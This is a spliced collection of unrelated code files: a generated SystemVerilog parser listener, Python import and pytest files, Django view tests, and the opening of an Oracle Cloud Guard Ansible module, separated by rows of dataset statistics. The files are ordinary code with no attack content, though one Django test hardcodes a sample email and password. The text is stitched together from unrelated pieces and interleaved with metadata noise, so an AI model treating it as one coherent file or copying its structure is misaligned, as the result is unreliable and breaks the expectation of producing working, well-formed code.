# Enter a parse tree produced by SystemVerilogParser#hierarchical_task_identifier.
def enterHierarchical_task_identifier(self, ctx:SystemVerilogParser.Hierarchical_task_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_task_identifier.
def exitHierarchical_task_identifier(self, ctx:SystemVerilogParser.Hierarchical_task_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_tf_identifier.
def enterHierarchical_tf_identifier(self, ctx:SystemVerilogParser.Hierarchical_tf_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_tf_identifier.
def exitHierarchical_tf_identifier(self, ctx:SystemVerilogParser.Hierarchical_tf_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_variable_identifier.
def enterHierarchical_variable_identifier(self, ctx:SystemVerilogParser.Hierarchical_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hierarchical_variable_identifier.
def exitHierarchical_variable_identifier(self, ctx:SystemVerilogParser.Hierarchical_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#identifier.
def enterIdentifier(self, ctx:SystemVerilogParser.IdentifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#identifier.
def exitIdentifier(self, ctx:SystemVerilogParser.IdentifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#index_variable_identifier.
def enterIndex_variable_identifier(self, ctx:SystemVerilogParser.Index_variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#index_variable_identifier.
def exitIndex_variable_identifier(self, ctx:SystemVerilogParser.Index_variable_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_identifier.
def enterInterface_identifier(self, ctx:SystemVerilogParser.Interface_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_identifier.
def exitInterface_identifier(self, ctx:SystemVerilogParser.Interface_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_instance_identifier.
def enterInterface_instance_identifier(self, ctx:SystemVerilogParser.Interface_instance_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_instance_identifier.
def exitInterface_instance_identifier(self, ctx:SystemVerilogParser.Interface_instance_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inout_port_identifier.
def enterInout_port_identifier(self, ctx:SystemVerilogParser.Inout_port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inout_port_identifier.
def exitInout_port_identifier(self, ctx:SystemVerilogParser.Inout_port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#input_port_identifier.
def enterInput_port_identifier(self, ctx:SystemVerilogParser.Input_port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#input_port_identifier.
def exitInput_port_identifier(self, ctx:SystemVerilogParser.Input_port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#instance_identifier.
def enterInstance_identifier(self, ctx:SystemVerilogParser.Instance_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#instance_identifier.
def exitInstance_identifier(self, ctx:SystemVerilogParser.Instance_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#library_identifier.
def enterLibrary_identifier(self, ctx:SystemVerilogParser.Library_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#library_identifier.
def exitLibrary_identifier(self, ctx:SystemVerilogParser.Library_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#member_identifier.
def enterMember_identifier(self, ctx:SystemVerilogParser.Member_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#member_identifier.
def exitMember_identifier(self, ctx:SystemVerilogParser.Member_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#method_identifier.
def enterMethod_identifier(self, ctx:SystemVerilogParser.Method_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#method_identifier.
def exitMethod_identifier(self, ctx:SystemVerilogParser.Method_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#modport_identifier.
def enterModport_identifier(self, ctx:SystemVerilogParser.Modport_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#modport_identifier.
def exitModport_identifier(self, ctx:SystemVerilogParser.Modport_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_identifier.
def enterModule_identifier(self, ctx:SystemVerilogParser.Module_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_identifier.
def exitModule_identifier(self, ctx:SystemVerilogParser.Module_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#net_identifier.
def enterNet_identifier(self, ctx:SystemVerilogParser.Net_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#net_identifier.
def exitNet_identifier(self, ctx:SystemVerilogParser.Net_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#net_type_identifier.
def enterNet_type_identifier(self, ctx:SystemVerilogParser.Net_type_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#net_type_identifier.
def exitNet_type_identifier(self, ctx:SystemVerilogParser.Net_type_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#output_port_identifier.
def enterOutput_port_identifier(self, ctx:SystemVerilogParser.Output_port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#output_port_identifier.
def exitOutput_port_identifier(self, ctx:SystemVerilogParser.Output_port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#package_identifier.
def enterPackage_identifier(self, ctx:SystemVerilogParser.Package_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#package_identifier.
def exitPackage_identifier(self, ctx:SystemVerilogParser.Package_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#package_scope.
def enterPackage_scope(self, ctx:SystemVerilogParser.Package_scopeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#package_scope.
def exitPackage_scope(self, ctx:SystemVerilogParser.Package_scopeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_identifier.
def enterParameter_identifier(self, ctx:SystemVerilogParser.Parameter_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_identifier.
def exitParameter_identifier(self, ctx:SystemVerilogParser.Parameter_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_identifier.
def enterPort_identifier(self, ctx:SystemVerilogParser.Port_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_identifier.
def exitPort_identifier(self, ctx:SystemVerilogParser.Port_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#production_identifier.
def enterProduction_identifier(self, ctx:SystemVerilogParser.Production_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#production_identifier.
def exitProduction_identifier(self, ctx:SystemVerilogParser.Production_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_identifier.
def enterProgram_identifier(self, ctx:SystemVerilogParser.Program_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_identifier.
def exitProgram_identifier(self, ctx:SystemVerilogParser.Program_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#property_identifier.
def enterProperty_identifier(self, ctx:SystemVerilogParser.Property_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#property_identifier.
def exitProperty_identifier(self, ctx:SystemVerilogParser.Property_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_class_identifier.
def enterPs_class_identifier(self, ctx:SystemVerilogParser.Ps_class_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_class_identifier.
def exitPs_class_identifier(self, ctx:SystemVerilogParser.Ps_class_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_covergroup_identifier.
def enterPs_covergroup_identifier(self, ctx:SystemVerilogParser.Ps_covergroup_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_covergroup_identifier.
def exitPs_covergroup_identifier(self, ctx:SystemVerilogParser.Ps_covergroup_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_checker_identifier.
def enterPs_checker_identifier(self, ctx:SystemVerilogParser.Ps_checker_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_checker_identifier.
def exitPs_checker_identifier(self, ctx:SystemVerilogParser.Ps_checker_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_identifier.
def enterPs_identifier(self, ctx:SystemVerilogParser.Ps_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_identifier.
def exitPs_identifier(self, ctx:SystemVerilogParser.Ps_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_array_identifier.
def enterPs_or_hierarchical_array_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_array_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_array_identifier.
def exitPs_or_hierarchical_array_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_array_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_net_identifier.
def enterPs_or_hierarchical_net_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_net_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_net_identifier.
def exitPs_or_hierarchical_net_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_net_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_property_identifier.
def enterPs_or_hierarchical_property_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_property_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_property_identifier.
def exitPs_or_hierarchical_property_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_property_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_sequence_identifier.
def enterPs_or_hierarchical_sequence_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_sequence_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_sequence_identifier.
def exitPs_or_hierarchical_sequence_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_sequence_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_or_hierarchical_tf_identifier.
def enterPs_or_hierarchical_tf_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_tf_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_or_hierarchical_tf_identifier.
def exitPs_or_hierarchical_tf_identifier(self, ctx:SystemVerilogParser.Ps_or_hierarchical_tf_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_parameter_identifier.
def enterPs_parameter_identifier(self, ctx:SystemVerilogParser.Ps_parameter_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_parameter_identifier.
def exitPs_parameter_identifier(self, ctx:SystemVerilogParser.Ps_parameter_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ps_type_identifier.
def enterPs_type_identifier(self, ctx:SystemVerilogParser.Ps_type_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ps_type_identifier.
def exitPs_type_identifier(self, ctx:SystemVerilogParser.Ps_type_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#sequence_identifier.
def enterSequence_identifier(self, ctx:SystemVerilogParser.Sequence_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#sequence_identifier.
def exitSequence_identifier(self, ctx:SystemVerilogParser.Sequence_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#signal_identifier.
def enterSignal_identifier(self, ctx:SystemVerilogParser.Signal_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#signal_identifier.
def exitSignal_identifier(self, ctx:SystemVerilogParser.Signal_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#simple_identifier.
def enterSimple_identifier(self, ctx:SystemVerilogParser.Simple_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#simple_identifier.
def exitSimple_identifier(self, ctx:SystemVerilogParser.Simple_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#specparam_identifier.
def enterSpecparam_identifier(self, ctx:SystemVerilogParser.Specparam_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#specparam_identifier.
def exitSpecparam_identifier(self, ctx:SystemVerilogParser.Specparam_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#task_identifier.
def enterTask_identifier(self, ctx:SystemVerilogParser.Task_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#task_identifier.
def exitTask_identifier(self, ctx:SystemVerilogParser.Task_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tf_identifier.
def enterTf_identifier(self, ctx:SystemVerilogParser.Tf_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tf_identifier.
def exitTf_identifier(self, ctx:SystemVerilogParser.Tf_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#terminal_identifier.
def enterTerminal_identifier(self, ctx:SystemVerilogParser.Terminal_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#terminal_identifier.
def exitTerminal_identifier(self, ctx:SystemVerilogParser.Terminal_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#topmodule_identifier.
def enterTopmodule_identifier(self, ctx:SystemVerilogParser.Topmodule_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#topmodule_identifier.
def exitTopmodule_identifier(self, ctx:SystemVerilogParser.Topmodule_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#type_identifier.
def enterType_identifier(self, ctx:SystemVerilogParser.Type_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#type_identifier.
def exitType_identifier(self, ctx:SystemVerilogParser.Type_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#udp_identifier.
def enterUdp_identifier(self, ctx:SystemVerilogParser.Udp_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#udp_identifier.
def exitUdp_identifier(self, ctx:SystemVerilogParser.Udp_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#variable_identifier.
def enterVariable_identifier(self, ctx:SystemVerilogParser.Variable_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#variable_identifier.
def exitVariable_identifier(self, ctx:SystemVerilogParser.Variable_identifierContext):
pass
del SystemVerilogParser
| 41.735889
| 141
| 0.771122
| 29,212
| 274,330
| 6.991921
| 0.037861
| 0.04286
| 0.071433
| 0.128579
| 0.924792
| 0.915598
| 0.915598
| 0.783606
| 0.777927
| 0.469552
| 0
| 0.000445
| 0.18095
| 274,330
| 6,573
| 142
| 41.735889
| 0.908576
| 0.375183
| 0
| 0.498803
| 1
| 0
| 0.000006
| 0
| 0
| 0
| 0
| 0
| 0.008895
| 1
| 0.498803
| false
| 0.50154
| 0.005132
| 0
| 0.504276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
6b0188e17e264d12c71fc510e34506fdab4211db
| 130
|
py
|
Python
|
src/deidentify_data/__init__.py
|
ksaustin88/deidentify_data
|
24a0aa252c7f135185109044437595927a616104
|
[
"MIT"
] | null | null | null |
src/deidentify_data/__init__.py
|
ksaustin88/deidentify_data
|
24a0aa252c7f135185109044437595927a616104
|
[
"MIT"
] | null | null | null |
src/deidentify_data/__init__.py
|
ksaustin88/deidentify_data
|
24a0aa252c7f135185109044437595927a616104
|
[
"MIT"
] | null | null | null |
import src.deidentify_data.core
import src.deidentify_data.utilities
import src.deidentify_data.io
from src import deidentify_data
| 32.5
| 36
| 0.884615
| 20
| 130
| 5.55
| 0.4
| 0.504505
| 0.513514
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069231
| 130
| 4
| 37
| 32.5
| 0.917355
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6b14fad20ef7c6a476b2deb21e15c838d3a26517
| 1,375
|
py
|
Python
|
tests/parsing/test_range_from_text.py
|
sixty-north/les_iterables
|
755cdde4dd9e3d56ce2f424ff0619bde7064e897
|
[
"MIT"
] | 2
|
2020-07-04T22:21:10.000Z
|
2021-12-10T14:38:18.000Z
|
tests/parsing/test_range_from_text.py
|
sixty-north/les_iterables
|
755cdde4dd9e3d56ce2f424ff0619bde7064e897
|
[
"MIT"
] | 1
|
2020-05-26T12:01:50.000Z
|
2020-05-26T12:01:50.000Z
|
tests/parsing/test_range_from_text.py
|
sixty-north/les_iterables
|
755cdde4dd9e3d56ce2f424ff0619bde7064e897
|
[
"MIT"
] | null | null | null |
from pytest import raises
from les_iterables.parsing import range_from_text
def test_range_from_text_empty():
with raises(ValueError):
range_from_text("")
def test_range_from_text_non_numeric():
with raises(ValueError):
range_from_text("NOT A NUMBER")
def test_range_from_text_single_number():
assert range_from_text("5") == range(5, 6)
def test_range_from_text_single_element_range():
assert range_from_text("5-5") == range(5, 6)
def test_range_from_text_two_element_range():
assert range_from_text("5-6") == range(5, 7)
def test_range_from_text_ten_element_range():
assert range_from_text("5-15") == range(5, 16)
def test_range_from_text_ten_element_range_space_before():
assert range_from_text(" 5-15") == range(5, 16)
def test_range_from_text_ten_element_range_space_after():
assert range_from_text("5-15 ") == range(5, 16)
def test_range_from_text_ten_element_range_space_between():
assert range_from_text("5 - 15") == range(5, 16)
def test_range_from_text_two_element_range_non_default_separator():
assert range_from_text("5—-6", separator="—-") == range(5, 7)
def test_range_from_negative_raises_value_error():
with raises(ValueError):
range_from_text("-5 - 15")
def test_descending_range_raises_value_error():
with raises(ValueError):
range_from_text("10-5")
| 24.553571
| 67
| 0.741818
| 217
| 1,375
| 4.235023
| 0.18894
| 0.235038
| 0.325354
| 0.191513
| 0.820457
| 0.774755
| 0.682263
| 0.593036
| 0.45049
| 0.282916
| 0
| 0.03833
| 0.146182
| 1,375
| 55
| 68
| 25
| 0.74276
| 0
| 0
| 0.266667
| 0
| 0
| 0.042909
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 1
| 0.4
| true
| 0
| 0.066667
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86356a16194f55ecf1ebf6d2a79d4e791ac27e68
| 2,844
|
py
|
Python
|
searchBar/booking/tests.py
|
rajvijen/Industry-Visit-Planning-and-Booking
|
fe54f9f354eb88cd78b1bc18a61908fe7de03577
|
[
"MIT"
] | null | null | null |
searchBar/booking/tests.py
|
rajvijen/Industry-Visit-Planning-and-Booking
|
fe54f9f354eb88cd78b1bc18a61908fe7de03577
|
[
"MIT"
] | 8
|
2019-09-05T04:58:20.000Z
|
2022-01-13T00:58:01.000Z
|
searchBar/booking/tests.py
|
rajvijen/ASE-101
|
fe54f9f354eb88cd78b1bc18a61908fe7de03577
|
[
"MIT"
] | 5
|
2018-11-15T19:04:29.000Z
|
2018-11-17T06:10:38.000Z
|
from django.test import TestCase ,Client
from django.http import HttpRequest
from django.urls import reverse
from basicapp.models import UserProfileInfo
from django.contrib.auth.models import User
class ListView_Testing(TestCase):
@classmethod
def setUpTestData(cls):
cls.client = Client()
cls.user = User.objects.create_user(username = "hemanth",email='hreddy281@gmail.com', password='devilmaycry4')
cls.profile = UserProfileInfo.objects.create(user = cls.user,name = "hemanth",gender = "M")
'''
def test_con_indi(self):
self.client.force_login(self.user)
response = self.client.get(reverse('booking:con_indi'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'booking/book_indi.html')
def test_con_orga(self):
self.client.force_login(self.user)
response = self.client.get(reverse('booking:con_orga'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'booking/book_orga.html')
def test_book_train_indi(self):
#self.client.force_login(self.user)
response = self.client.get(reverse('booking:book_train_indi'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'booking/list_train.html')
def test_view_book_air_orga(self):
response = self.client.get(reverse('booking:book_air_indi'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'booking/list_flight.html')
'''
class URL_Testing(TestCase):
@classmethod
def setUpTestData(cls):
cls.client = Client()
cls.user = User.objects.create_user(username = "hemanth",email='hreddy281@gmail.com', password='devilmaycry4')
cls.profile = UserProfileInfo.objects.create(user = cls.user,name = "hemanth",gender = "M")
'''
def test_con_indi(self):
response = self.client.get(reverse('booking:con_indi'))
self.assertEqual(response.status_code, 302)
def test_con_orga(self):
response = self.client.get(reverse('booking:con_orga'))
self.assertEqual(response.status_code, 302)
def test_book_train_indi(self):
#self.client.force_login(self.user)
response = self.client.get(reverse('booking:book_train_indi'))
self.assertEqual(response.status_code, 200)
#self.assertTemplateUsed(response, 'booking/list_train.html')
class Form_Testing(TestCase):
@classmethod
def setUpTestData(cls):
cls.client = Client()
cls.user = User.objects.create_user(username = "hemanth",email='hreddy281@gmail.com', password='devilmaycry4')
cls.profile = UserProfileInfo.objects.create(user = cls.user,name = "hemanth",gender = "M")
'''
| 41.217391
| 119
| 0.686709
| 338
| 2,844
| 5.630178
| 0.180473
| 0.057803
| 0.066211
| 0.077246
| 0.871256
| 0.862323
| 0.862323
| 0.860221
| 0.82659
| 0.82659
| 0
| 0.014348
| 0.19128
| 2,844
| 69
| 120
| 41.217391
| 0.813043
| 0
| 0
| 0.588235
| 0
| 0
| 0.107981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0.117647
| 0.294118
| 0
| 0.529412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
86512d418fe64d54f1cb927d25353cdfea239c81
| 102,502
|
py
|
Python
|
plugins/modules/oci_cloud_guard_target.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_cloud_guard_target.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_cloud_guard_target.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_cloud_guard_target
short_description: Manage a Target resource in Oracle Cloud Infrastructure
description:
- This module allows the user to create, update and delete a Target resource in Oracle Cloud Infrastructure
- For I(state=present), creates a new Target
version_added: "2.9.0"
author: Oracle (@oracle)
options:
display_name:
description:
- DetectorTemplate Identifier
- Required for create using I(state=present).
- Required for update, delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- This parameter is updatable when C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["name"]
compartment_id:
description:
- Compartment Identifier where the resource is created
- Required for create using I(state=present).
- Required for update when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- Required for delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
type: str
description:
description:
- The target description.
type: str
target_resource_type:
description:
- possible type of targets(compartment/HCMCloud/ERPCloud)
- Required for create using I(state=present).
type: str
choices:
- "COMPARTMENT"
- "ERPCLOUD"
- "HCMCLOUD"
target_resource_id:
description:
- Resource ID which the target uses to monitor
- Required for create using I(state=present).
type: str
target_detector_recipes:
description:
- List of detector recipes to associate with target
- This parameter is updatable.
type: list
elements: dict
suboptions:
detector_recipe_id:
description:
- Identifier for DetectorRecipe.
type: str
detector_rules:
description:
- Overrides to be applied to Detector Rule associated with the target
type: list
elements: dict
suboptions:
detector_rule_id:
description:
- Identifier for DetectorRule.
type: str
required: true
details:
description:
- ""
type: dict
required: true
suboptions:
condition_groups:
description:
- Condition group corresponding to each compartment
type: list
elements: dict
suboptions:
compartment_id:
description:
- compartment associated with condition
type: str
required: true
condition:
description:
- ""
type: dict
required: true
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "SIMPLE"
- "COMPOSITE"
required: true
parameter:
description:
- parameter Key
- Applicable when kind is 'SIMPLE'
type: str
operator:
description:
- type of operator
- Applicable when kind is 'SIMPLE'
type: str
choices:
- "IN"
- "NOT_IN"
- "EQUALS"
- "NOT_EQUALS"
value:
description:
- type of operator
- Applicable when kind is 'SIMPLE'
type: str
value_type:
description:
- type of value
- Applicable when kind is 'SIMPLE'
type: str
choices:
- "MANAGED"
- "CUSTOM"
left_operand:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "COMPOSITE"
- "SIMPLE"
required: true
composite_operator:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: str
choices:
- "AND"
- "OR"
right_operand:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "COMPOSITE"
- "SIMPLE"
required: true
target_detector_recipe_id:
description:
- Identifier for DetectorRecipe.
- This parameter is updatable.
type: str
target_responder_recipes:
description:
- List of responder recipes to associate with target
- This parameter is updatable.
type: list
elements: dict
suboptions:
responder_recipe_id:
description:
- Identifier for ResponderRecipe.
type: str
responder_rules:
description:
- Override responder rules associated with reponder recipe in a target.
type: list
elements: dict
suboptions:
responder_rule_id:
description:
- Identifier for ResponderRule.
type: str
required: true
details:
description:
- ""
type: dict
required: true
suboptions:
condition:
description:
- ""
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "SIMPLE"
- "COMPOSITE"
required: true
parameter:
description:
- parameter Key
- Applicable when kind is 'SIMPLE'
type: str
operator:
description:
- type of operator
- Applicable when kind is 'SIMPLE'
type: str
choices:
- "IN"
- "NOT_IN"
- "EQUALS"
- "NOT_EQUALS"
value:
description:
- type of operator
- Applicable when kind is 'SIMPLE'
type: str
value_type:
description:
- type of value
- Applicable when kind is 'SIMPLE'
type: str
choices:
- "MANAGED"
- "CUSTOM"
left_operand:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "COMPOSITE"
- "SIMPLE"
required: true
composite_operator:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: str
choices:
- "AND"
- "OR"
right_operand:
description:
- ""
- Applicable when kind is 'COMPOSITE'
type: dict
suboptions:
kind:
description:
- Type of condition object
type: str
choices:
- "COMPOSITE"
- "SIMPLE"
required: true
configurations:
description:
- Configurations associated with the ResponderRule
type: list
elements: dict
suboptions:
config_key:
description:
- Unique name of the configuration
type: str
required: true
name:
description:
- configuration name
type: str
required: true
value:
description:
- configuration value
type: str
required: true
mode:
description:
- Execution Mode for ResponderRule
type: str
choices:
- "AUTOACTION"
- "USERACTION"
target_responder_recipe_id:
description:
- Identifier for ResponderRecipe.
- This parameter is updatable.
type: str
lifecycle_state:
description:
- The current state of the DetectorRule.
- This parameter is updatable.
type: str
choices:
- "CREATING"
- "UPDATING"
- "ACTIVE"
- "INACTIVE"
- "DELETING"
- "DELETED"
- "FAILED"
freeform_tags:
description:
- "Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\\"bar-key\\": \\"value\\"}`"
- This parameter is updatable.
type: dict
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\\"foo-namespace\\": {\\"bar-key\\": \\"value\\"}}`"
- This parameter is updatable.
type: dict
target_id:
description:
- OCID of target
- Required for update using I(state=present) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
- Required for delete using I(state=absent) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["id"]
state:
description:
- The state of the Target.
- Use I(state=present) to create or update a Target.
- Use I(state=absent) to delete a Target.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Create target
oci_cloud_guard_target:
display_name: display_name_example
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
target_resource_type: COMPARTMENT
target_resource_id: "ocid1.targetresource.oc1..xxxxxxEXAMPLExxxxxx"
- name: Update target using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
